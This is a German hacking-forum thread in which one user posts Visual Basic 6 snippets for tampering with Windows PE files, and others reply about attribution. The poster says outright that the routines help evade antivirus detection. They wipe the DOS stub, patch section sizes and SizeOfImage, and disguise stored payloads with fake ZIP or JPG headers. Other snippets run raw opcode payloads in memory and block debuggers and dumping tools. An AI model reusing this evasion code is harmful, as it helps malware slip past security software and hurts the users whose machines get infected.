Hi Leute
hier ist ein kleines snippet womit man den dos header/dos stub im PE Header entfernen kann was helfen kann ein paar detections zu entfernen
----------------------------------------------------------------------------------------------------------------Code:Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Private Type IMAGE_IMPORT_DESCRIPTOR Characteristics As Long OriginalFirstThunk As Long TimDateStamp As Long ForwarderChain As Long Name1 As Long FirstThunk As Long End Type Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Public Function WipeDosStub(sOldFile As String, sNewFile As String) As Boolean Dim lpDosStub As Long Dim lpEOH As Long Dim lpSOH As Long Dim bFile1() As Byte Dim bFile2() As Byte Dim bTemp() As Byte Dim IDH As IMAGE_DOS_HEADER Dim INH As IMAGE_NT_HEADERS Dim i As Long Dim lpTmp As Long Open sOldFile For Binary As #1 ReDim bFile1(LOF(1) - 1) Get #1, , bFile1 Close #1 Call CopyMemory(IDH, bFile1(0), SIZE_DOS_HEADER) Call CopyMemory(INH, bFile1(IDH.e_lfanew), SIZE_NT_HEADERS) If Not IDH.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function If Not INH.Signature = IMAGE_NT_SIGNATURE Then Exit Function lpDosStub = IDH.e_lfanew - &H40 ReDim Preserve bFile2(SIZE_DOS_HEADER) As Byte CopyMemory bFile2(0), bFile1(0), SIZE_DOS_HEADER lpEOH = IDH.e_lfanew + 248 + INH.FileHeader.NumberOfSections * 40 lpSOH = lpEOH - IDH.e_lfanew lpTmp = Length(bFile2) ReDim Preserve bFile2(lpTmp + lpSOH) As Byte CopyMemory bFile2(lpTmp), bFile1(IDH.e_lfanew), lpSOH lpTmp = Length(bFile2) ReDim bTemp(lpDosStub) As Byte For i = 0 To lpDosStub - 1 bTemp(i) = &H0 Next i ReDim Preserve bFile2(lpTmp + lpDosStub) As Byte CopyMemory bFile2(lpTmp), bTemp(0), lpDosStub lpTmp = Length(bFile2) ReDim Preserve bFile2(Length(bFile1)) As Byte CopyMemory bFile2(lpTmp), bFile1(lpEOH), Length(bFile1) - lpEOH IDH.e_lfanew = SIZE_DOS_HEADER CopyMemory bFile2(0), IDH, 64 Open sNewFile For Binary As #1 Put #1, , bFile2 Close #1 WipeDosStub = True End Function Function Length(abArray() As Byte) As Long Length = UBound(abArray) - LBound(abArray) End Function
euch ist bestimmt aufgefallen das die VB6 Funktion StrConv manchmal detected wird hier ist eine kleine alternative
----------------------------------------------------------------------------------------------------------------Code:Public Function AltStrConv(Temp As Variant, Conversion As VbStrConv) As Variant Dim I As Long, lLen As Long Dim bArr() As Byte, sString As String If Conversion = vbFromUnicode Then sString = Temp lLen = Len(sString) - 1 ReDim bArr(lLen) For I = 0 To lLen bArr(I) = Asc(Mid(Temp, (I + 1), 1)) Next I AltStrConv = bArr ElseIf Conversion = vbUnicode Then bArr = Temp lLen = UBound(Temp) sString = Space$(lLen + 1) For I = 0 To lLen sString = sString & Chr(bArr(I)) Next I AltStrConv = sString End If End Function
Hier eine Funktionen um die nutzlosen 00 zu Löschen wo normal die Eof Data gespeichert wird
----------------------------------------------------------------------------------------------------------------Code:Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_SECTION_HEADER As Long = &H28 Public Type IMAGE_DOS_HEADER e_magic As Integer ' Magic number e_cblp As Integer ' Bytes on last page of file e_cp As Integer ' Pages in file e_crlc As Integer ' Relocations e_cparhdr As Integer ' Size of header in paragraphs e_minalloc As Integer ' Minimum extra paragraphs needed e_maxalloc As Integer ' Maximum extra paragraphs needed e_ss As Integer ' Initial (relative) SS value e_sp As Integer ' Initial SP value e_csum As Integer ' Checksum e_ip As Integer ' Initial IP value e_cs As Integer ' Initial (relative) CS value e_lfarlc As Integer ' File address of relocation table e_ovno As Integer ' Overlay number e_res(0 To 3) As Integer ' Reserved words e_oemid As Integer ' OEM identifier (for e_oeminfo) e_oeminfo As Integer ' OEM information; e_oemid specific e_res2(0 To 9) As Integer ' Reserved words e_lfanew As Long ' File address of new exe header End Type Public Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer Name As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long AddressOfFunctions As Long AddressOfNames As Long AddressOfNameOrdinals As Long End Type Public Type IMAGE_IMPORT_DIRECTORY dwRVAFunctionNameList As Long TimeDateStamp As Long ForwarderChain As Long dwRVAModuleName As Long dwRVAFunctionAddressList As Long End Type Public Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Public Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Public Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Public Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Public Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type 'IMAGE DATA DIRECTORY: '1-Export Table '2-Import Table '3-Resource Table '4-Exception Table '5-Certificate Table '6-Relocation Table '7-Debug Data '8-Architecture Data '9-Machine Value (MIPS GP) '10-TLS Table '11-Load Configuration Table '12-Bound Import Table '13-Import Address Table '14-Delay Import Descriptor '15-COM+ Runtime Header '16-Reserved Dim IDH As IMAGE_DOS_HEADER Dim INH As IMAGE_NT_HEADERS Dim ISH As IMAGE_SECTION_HEADER Private Declare Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (dest As Any, Src As Any, ByVal L As Long) Public Function Delete_NOPS(Data As String, Result As String) Dim bFile() As Byte Dim bResult() As Byte Dim i As Long Dim ZeroCount As Long Open Data For Binary As #1 ReDim bFile(LOF(1)) Get #1, , bFile Close #1 Call CopyMemory(IDH, bFile(0), SIZE_DOS_HEADER) Call CopyMemory(INH, bFile(IDH.e_lfanew), SIZE_NT_HEADERS) Call CopyMemory(ISH, bFile(IDH.e_lfanew + SIZE_NT_HEADERS + (INH.FileHeader.NumberOfSections - 1) * &H28), &H28) ZeroCount = 0 i = ISH.PointerToRawData + ISH.SizeOfRawData While i > ISH.PointerToRawData If bFile(i) = 0 Then ZeroCount = ZeroCount + 1 End If i = i - 1 Wend ReDim bResult(UBound(bFile) - ZeroCount) Call CopyMemory(bResult(0), bFile(0), UBound(bFile) - ZeroCount) ISH.SizeOfRawData = ISH.SizeOfRawData - ZeroCount Call CopyMemory(bResult(IDH.e_lfanew + 248 + (INH.FileHeader.NumberOfSections - 1) * 40), ISH, 40) Open Result For Binary As #1 Put #1, , bResult Close #1 End Function
Mit dieser Funktion könnt ihr die größe (SizeOfRawData , SizeOfVirutalData) der RSRC Section anpassen was oft einige Antiviruse umgeht weil diese erkennen wenn die größen nicht korrekt sind
----------------------------------------------------------------------------------------------------------------Code:Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Src As Any, ByVal L As Long) Function EnlargeSection(szFilePath As String, Length As String) As Boolean Dim bFile() As Byte, IDH As IMAGE_DOS_HEADER, INH As IMAGE_NT_HEADERS, ISH As IMAGE_SECTION_HEADER Open szFilePath For Binary Access Read As #1 ReDim bFile(LOF(1)) Get #1, , bFile Close #1 Call CopyMemory(IDH, bFile(0), 64) If IDH.e_magic = IMAGE_DOS_SIGNATURE Then Call CopyMemory(INH, bFile(IDH.e_lfanew), 248) If INH.Signature = IMAGE_NT_SIGNATURE Then Call CopyMemory(ISH, bFile(IDH.e_lfanew + 248 + (INH.FileHeader.NumberOfSections - 1) * 40), 40) ISH.SizeOfRawData = ISH.SizeOfRawData + Length ISH.VirtualSize = ISH.VirtualSize + Length INH.OptionalHeader.SizeOfImage = ISH.VirtualAddress + ISH.VirtualSize Call CopyMemory(bFile(IDH.e_lfanew), INH, 248) Call CopyMemory(bFile(IDH.e_lfanew + 248 + (INH.FileHeader.NumberOfSections - 1) * 40), ISH, 40) Open szFilePath For Binary Access Write As #1 Put #1, , bFile() Close End If End If End Function
Diese Funktion gibt den aktuellen Exenamen/Pfad zurück von euere Datei.
----------------------------------------------------------------------------------------------------------------Code:Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, Optional ByVal hwnd As Long, Optional ByVal Msg As Long, Optional ByVal wParam As Long, Optional ByVal lParam As Long) As Long Public Function GetFileName() As String Dim mOpCode As String Dim bvName(519) As Byte GetFileName = bvName mOpCode = "64A1300000008B40108B703C0FB748388" & _ "B7C240451FCF3A4598B742404894EFCC3" ReDim mAsmByte(0 To Len(mOpCode) / 2 - 1) As Byte For i = 0 To Len(mOpCode) - 1 Step 2 mAsmByte((i / 2)) = CByte("&h" & Mid$(mOpCode, i + 1, 2)) Next CallWindowProc VarPtr(mAsmByte(0)), StrPtr(GetFileName) End Function
Hier ist eine kleine Funktion welche ich geschrieben habe die vollkommen Unicode Kombatibel ist. Sie ersetzt z.b.
Funktion:Code:Dim Size As String Open App.Path & "\DeineDatei.exe" For Binary As #1 Size = Space(LOF(1)) Get #1, , Size Close #1
So nutzt ihr sie:Code:Option Explicit Private Type OVERLAPPED ternal As Long ternalHigh As Long offset As Long OffsetHigh As Long hEvent As Long End Type Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileW" ( _ ByVal lpFileName As Long, _ ByVal dwDesiredAccess&, _ ByVal dwShareMode&, _ ByVal lpSecurityAttributes&, _ ByVal dwCreationDisposition&, _ ByVal dwFlagsAndAttributes&, _ ByVal hTemplateFile&) As Long Private Declare Function ReadFile Lib "kernel32.dll" ( _ ByVal hFile As Long, _ ByRef lpBuffer As Any, _ ByVal nNumberOfBytesToRead As Long, _ ByRef lpNumberOfBytesRead As Long, _ ByRef lpOverlapped As OVERLAPPED) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject&) As Long Private Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long Private Declare Function GetFileSizeEx Lib "kernel32.dll" (ByVal hFile As Long, ByRef lpFileSize As Currency) As Long Private Const GENERIC_READ As Long = &H80000000 Private Const GENERIC_WRITE As Long = &H40000000 Private Const FILE_SHARE_READ As Long = &H1& Private Const FILE_SHARE_WRITE As Long = &H2& Private Const CREATE_NEW As Long = 1& Private Const CREATE_ALWAYS As Long = 2& Private Const OPEN_EXISTING As Long = 3& Private Const OPEN_ALWAYS As Long = 4& Private Const TRUNCATE_EXISTING As Long = 5& Private Const FILE_BEGIN As Long = 0 Private Function getFileString(FileName As String) As String Dim FileSize As Currency Dim hFile As Long Dim lOverLapped As OVERLAPPED Dim TxtBytes() As Byte Dim Ret As Long Dim I As Integer Dim Start As Long hFile = CreateFile(StrPtr(FileName), GENERIC_READ, FILE_SHARE_READ, 0&, OPEN_EXISTING, 0&, 0&) If hFile <> -1 Then If GetFileSizeEx(hFile, FileSize) Then ReDim TxtBytes(0 To FileSize) As Byte Start = 0 Call SetFilePointer(hFile, Start, 0, FILE_BEGIN) If ReadFile(hFile, TxtBytes(0), FileSize, 0, lOverLapped) Then getFileString = StrConv(TxtBytes, vbUnicode) End If End If End If CloseHandle hFile End Function
----------------------------------------------------------------------------------------------------------------Code:Dim Size as String Size = getFileString("c:\a.txt")
Hier eine Funktion welche keine CallWindowProcW Api nutzt. Ihr könnt daraus ganz einfach ein CallApiByName basteln werde die Tage auch ein paar releasen.
----------------------------------------------------------------------------------------------------------------Code:Private Declare Function SetMemNewObj Lib "msvbvm60" (ByVal ptr1 As Long, ByVal ptr2 As Long, ByVal ptr3 As Long, ByRef ptr2 As Long) As Long Private Type DUMB_LONG lLNG As Long End Type Private Type BYTES_LONG b1 As Byte: b2 As Byte b3 As Byte: b4 As Byte End Type Private Function RunPayload(ByRef ASM() As Byte) As Long Dim AsmHandler(&HC) As Byte 'MOV EAX, PTR 'CALL EAX 'ADD ESP,C 'RETN AsmHandler(0) = &HB8: AddLong AsmHandler, VarPtr(ASM(0)), 1 AsmHandler(5) = &HFF: AsmHandler(6) = &HD0 AsmHandler(7) = &H83: AsmHandler(8) = &HC4 AsmHandler(9) = &HC: AsmHandler(10) = &HC2 AsmHandler(11) = &H8: AsmHandler(12) = &H0 RunPayload = SetMemNewObj(0, 0, 0, VarPtr(VarPtr(AsmHandler(0))) - &H4)) End Function Private Sub AddLong(ByRef ASM() As Byte, ByVal lLong As Long, ByVal Index As Long) 'Swap Endian (Ej: 0xDEADBEEF <-> 0xEFBEADDE) Dim tDL As DUMB_LONG Dim tBL As BYTES_LONG tDL.lLNG = lLong LSet tBL = tDL ASM(Index) = tBL.b1 ASM(Index + 1) = tBL.b2 ASM(Index + 2) = tBL.b3 ASM(Index + 3) = tBL.b4 End Sub
Mit der Funktion könnt ihr einen Fake Header adden eignet sich z.b. gut in Kombination mit der Resource Storage Methode.
----------------------------------------------------------------------------------------------------------------Code:Option Explicit Public Enum Header_Type ZIP = 1: RAR = 2: BMP = 3: JPG = 4: GIF = 5: ICO = 6: MSU = 7 End Enum Public Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hProcess As Long, ByRef lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByRef lpNumberOfBytesWritten As Long) As Long Public Function AddHeader(strBuffer As String, dwHeaderType As Header_Type) As String ' Add first 10 bytes from specified file type Dim bHeader(9) As Byte Dim bArray() As Byte Dim bRes() As Byte Dim lPos As Long Dim i As Integer bArray() = StrConv(strBuffer & vbNullString, vbFromUnicode) Select Case dwHeaderType Case 1 ' ZIP For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &H50, &H4B, &H3, &H4, &H14, &H0, &H0, &H0, &H8, &H9)) Next i Case 2 ' RAR For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &H52, &H61, &H72, &H21, &H1A, &H7, &H0, &HCF, &H90, &H73)) Next i Case 3 ' BMP For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &H42, &H4D, &HD8, &HBB, &HD, &H0, &H0, &H0, &H0, &H0)) Next i Case 4 ' JPG For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &HFF, &HD8, &HFF, &HE0, &H0, &H10, &H4A, &H46, &H49, &H46)) Next i Case 5 ' GIF For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &H47, &H49, &H46, &H38, &H39, &H61, &H64, &H0, &H64, &H0)) Next i Case 6 ' ICO For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &H0, &H0, &H1, &H0, &H8, &H0, &H30, &H30, &H0, &H0)) Next i Case 7 ' MSU For i = 0 To 9 bHeader(i) = CByte(Choose(i + 1, &H4D, &H53, &H43, &H46, &H0, &H0, &H0, &H0, &HE1, &H9)) Next i End Select bRes() = bHeader() lPos = UBound(bRes) ReDim Preserve bRes(UBound(bRes) + UBound(bArray) + 1) NtWriteVirtualMemory -1, bRes(lPos + 1), bArray(0), UBound(bArray) + 1, ByVal 0& AddHeader = StrConv(bRes(), vbUnicode) End Function
Hier eine Funktion womit ihr die SizeOfImage im PE Header anpassen könnt was manche Avs detecten wenn sie nicht stimmt
----------------------------------------------------------------------------------------------------------------Code:Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const IMAGE_NT_OPTIONAL_HDR32_MAGIC As Long = &H10B& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_SECTION_HEADER As Long = &H28 Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long Checksum As Long Subsystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Public Function FixSizeOfImage(sStrPath As String) Dim Size_of_File As String Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Open sStrPath For Binary As #1 Size_of_File = Space$(LOF(1)) Get #1, , Size_of_File Close #1 Open sStrPath For Binary As #1 Get #1, , tIMAGE_DOS_HEADER Get #1, 1 + tIMAGE_DOS_HEADER.e_lfanew, tIMAGE_NT_HEADERS tIMAGE_NT_HEADERS.OptionalHeader.SizeOfImage = Len(Size_of_File) Put #1, 1 + tIMAGE_DOS_HEADER.e_lfanew, tIMAGE_NT_HEADERS Close #1 End Function
Mit dieser Funktion könnt ihr eure Dateien vor Debuggern schützen
----------------------------------------------------------------------------------------------------------------Code:Option Explicit Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As Long Private Declare Sub RtlMoveMemory Lib "kernel32" (Destination As Any, source As Any, ByVal Length As Long) Private Declare Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As Long, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long Public Sub sAntiDump() Dim hModule As Long Dim bDosheader(63) As Byte Dim lngOldProtect As Long hModule = GetModuleHandleA(vbNullString) VirtualProtect ByVal hModule, 64, &H40, lngOldProtect RtlMoveMemory ByVal hModule, bDosheader(0), 64 VirtualProtect ByVal hModule, 64, lngOldProtect, lngOldProtect End Sub
Mit diesem Code könnt ihr die TEB adresse herausfinden aufgerufen wird es so:
Ich habe hier mal ein wenig aufgeräumt. mfg BarnyCode:Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByVal Destination As Any, ByVal Source As Any, ByVal Length As Long) Public Function GetTEB() As Long Dim b(6) As Byte Dim c(6) As Byte Dim d As Long b(0) = &H64 'MOV b(1) = &HA1 'EAX b(2) = &H18 '[FS:0x18] b(3) = &H0 b(4) = &H0 b(5) = &H0 b(6) = &HC3 'RET d = DoNotCall(AddressOf DoNotCall) CopyMemory ByVal VarPtr(c(0)), ByVal d, 7 CopyMemory ByVal d, ByVal VarPtr(b(0)), 7 GetTEB = DoNotCall CopyMemory ByVal d, ByVal VarPtr(c(0)), 7 End Function Public Function DoNotCall(Optional a As Long) As Long DoNotCall = a End Function
Ergebnis 1 bis 7 von 7
-
09.06.2015, 05:35 #1Anfänger
- Registriert seit
- 09.06.2015
- Beiträge
- 16
[Source Code] VB6 Code snippets
Geändert von Barny (10.06.2015 um 20:48 Uhr)
-
09.06.2015, 14:00 #2Sobig Wurm
- Registriert seit
- 08.04.2015
- Beiträge
- 201
AW: [Source Code] FixSizeOfImage
Es ist nicht schön etwas zu "verkaufen" was man nicht mal selbst erstellt hat. Ebenfalls ist es etwas dreisst den Autor einfach mal rauszulöschen.
http://read.pudn.com/downloads150/so...eOEP.bas__.htm
-
09.06.2015, 14:22 #3CIH-Virus
- Registriert seit
- 26.06.2009
- Beiträge
- 463
AW: [Source Code] Anti Dump (Anti Lord Pe,Pe Explorer ....)
Hättest du nicht einen Sammelthread erstellen können? Außerdem einfach irgendwelche Code Snippets posten, ohne weitere Informationen, ist auch nicht wirklich die feine Englische Art.
~Mfg
Mantrayana
C9vx_3BvNp12Jc
-
09.06.2015, 15:27 #4Trojaner
- Registriert seit
- 01.05.2015
- Beiträge
- 56
AW: [Source Code] FixSizeOfImage
Der eigentliche Autor.
Einfach beim nächsten Mal mit dazuschreiben woher du es hast.
'---------------------------------------------------------------------------------------
' Module : mChangeOEP
' DateTime : 02/12/2008 19:02
' Author : Cobein
' Mail : cobein27@hotmail.com
' WebPage : http://www.advancevb.com.ar
' Purpose : Change PE Entry Point
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any web site,
' online service, or distribute as source
' on any media without express permission.
'
' Reference : http://www.governmentsecurity.org/archive/t5873.html
'
' History : 02/12/2008 First Cut............................................... .....
' 02/12/2008 Two Bug Fixed on code position and entry point...............
'---------------------------------------------------------------------------------------
Grüße,
~H4wk
-
09.06.2015, 15:40 #5Anfänger
- Registriert seit
- 09.06.2015
- Beiträge
- 16
AW: [Source Code] FixSizeOfImage
Äm ich hab diese Funktion geschrieben schaut euch mal bitte die funktion genau an das sind 2 unterschiedliche auserdem kenne ich Cobein von HH hab mit ihm schon einige Projekte erstellt musst nicht heiße weil ich hier neu auf dem Board bin das ich ein noob bin.
-
09.06.2015, 15:41 #6Anfänger
- Registriert seit
- 09.06.2015
- Beiträge
- 16
AW: [Source Code] Anti Dump (Anti Lord Pe,Pe Explorer ....)
Okay werd ich demnächst machen hab soviele auf meiner fest Platte auserdem erklären sich die snippets von selber wie man sie aufruft
-
10.06.2015, 13:41 #7Trojaner
- Registriert seit
- 01.05.2015
- Beiträge
- 56
AW: [Source Code] Anti Dump (Anti Lord Pe,Pe Explorer ....)
1) Keiner sagt das du ein Noob bist.
Zitat von Trillium
2) Woher sollen wir wissen das du Cobein kennst, sind wir ein Orakel?
Als Tipp, erstell demnächst einfach EINEN Thread in dem du die Zusammenhänge von deinen Programmsnippets erklärst und wie man sie am effektivsten einsetzt. Es nützt relativ wenig, wenn man von dir 10.000 Snippets bekommt und als "Neuling" in VB keine Erklärung bekommt. Zitat von Trillium
Es erweckt außerdem einen etwas komischen Eindruck, wenn du einen Tag nach deinem registrieren 28 Beiträge hast, die alle dadruch stammen das du random Post Snippets postest.
Anyway, wenn du dein post Verhalten änderst und mehr zu deinen Snippets schreibst, bin ich sicher das ich ein regelmäßiger Besucher bei deinen Threads wäre.
Mit vielen Grüßen,
~H4wk
Zitieren
Ähnliche Themen
-
VB.NET Phising Source Code.
Von Stelmi007 im Forum .NET Sprachen - TechnikenAntworten: 2Letzter Beitrag: 11.02.2010, 22:09 -
[s] fud source code crypter
Von SUNZ im Forum TrashboxAntworten: 0Letzter Beitrag: 14.09.2009, 20:10
